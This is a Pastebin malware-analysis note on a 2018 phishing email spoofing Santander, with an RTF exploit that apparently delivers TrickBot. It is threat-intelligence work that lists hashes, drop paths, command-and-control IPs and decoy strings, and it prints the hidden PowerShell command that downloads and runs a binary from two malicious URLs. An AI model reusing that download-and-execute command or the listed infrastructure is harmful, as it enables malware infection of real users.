Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- found by @neonprimetime security
- 6/5/2018 email
- subject: A new message or other communication has arrived
- attachment: Secure Message.doc
- rtf doc with equation editor exploit
- doc body spoofs Santander
- https://www.hybri
- d-analysis.com/sample/cea456017fff6be22984c7ad6668bebd21b8c57b4ce86853821cbbd15e8bfdb8?environmentId=100https://app.any.run/tasks/80ee23c0-f24e-4f9a-a4f5-7204ad97c725
- 1fe7c89e4269fd6f0d238ba38b0d1431
- run batch script
- CmD /C %tmp%\task.bat
- which runs powershell
- PowerShell -W Hidden ""function NIKTAHCOP([String] $holispit){(New-Object System.Net.WebClient).DownloadFile($holispit,'C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe';}try{NIKTAHCOP('http://groupstalks.com/news.bin')}catch{NIKTAHCOP('http://iaecconsultants.com/news.bin')}""
- url it downloads from
- http://groupstalks.com/news.bin
- which downloads (no longer available now)
- 9ab498fc22237101236fb0048709795b
- to
- C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe
- appears related to trickbot per comments
- https://myonlinesecurity.co.uk/fake-santander-bank-a-new-message-or-other-communication-has-arrived-delivers-trickbot/
- iaecconsultants.com/news.bin
- copies itself to and runs from
- C:\Users\xxx\AppData\Roaming\logowin\newt.bin.exe
- ---------
- interesting in-memory strings
- ---------
- 0x28d180 (115): https://182.253.210.130:449/ser0605/[redactedinfo]_W617601.3C4F081FB772C6C5336BEA899B16365D/63/networkDll/start/(null)//
- 0x28e960 (26): 208.75.117.70
- 0x2911d4 (38): 185.228.233.225:447
- 0x2b4b40 (80): C:\Users\XXX\AppData\Roaming\logowin\
- 0x2c22bc (2172): <mcconf>
- <ver>1000208</ver>
- <gtag>tt0002</gtag>
- <servs>
- <srv>109.95.116.37:443</srv>
- <srv>93.109.242.134:443</srv>
- <srv>41.211.9.226:443</srv>
- <srv>158.58.131.54:443</srv>
- <srv>86.125.39.173:443</srv>
- <srv>208.75.117.70:443</srv>
- <srv>185.168.185.218:443</srv>
- <srv>109.86.227.152:443</srv>
- <srv>185.129.78.167:443</srv>
- <srv>190.4.189.129:443</srv>
- <srv>65.30.201.40:443</srv>
- <srv>66.232.212.59:443</srv>
- <srv>80.53.57.146:443</srv>
- <srv>182.253.210.130:449</srv>
- <srv>92.55.251.211:449</srv>
- <srv>94.112.52.197:449</srv>
- <srv>209.121.142.202:449</srv>
- <srv>5.102.177.205:449</srv>
- <srv>209.121.142.214:449</srv>
- <srv>95.161.180.42:449</srv>
- <srv>185.42.192.194:449</srv>
- <srv>46.72.175.17:449</srv>
- <srv>144.48.51.8:443</srv>
- <srv>85.143.221.28:443</srv>
- <srv>89.223.88.55:443</srv>
- <srv>185.174.172.112:443</srv>
- <srv>194.87.93.6:443</srv>
- <srv>82.146.40.79:443</srv>
- <srv>104.193.252.167:443</srv>
- <srv>185.159.129.51:443</srv>
- </servs>
- 0x2d8660 (126): Please select an organism from the
- drop-down box. Once selected, an
- organism will turn BLACK for easy
- identification.
- 0x68b050 (20): START new simulation
- 0x68b0b0 (23): Stop current simulation
- 0x68b450 (16): # of Organisms:
- 0x68b4d0 (16): Amount of food:
- 0x6960e0 (55): Tanner Helland for InBio 365: Biological Life Simulator
- 0x6979c8 (23): Display dead organisms?
- 0x6980b7 (35):
- Regenerate food every (x) cycles:
- 0x6981d0 (27): Regenerate this much food:
- 0x6982df (31): Food grants this much energy:
- 0x6984e7 (27):
- Multiply every (x) cycles:
- 0x6985f7 (27):
- New DNA mutates (x) bases:
- 0x6987f0 (31): Save simulation data to file...
- 0x698b38 (116): Press the start button to begin the simulator --------------------------------------------------------------------->
- 0x698bb7 (27):
- Please start the simulator
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement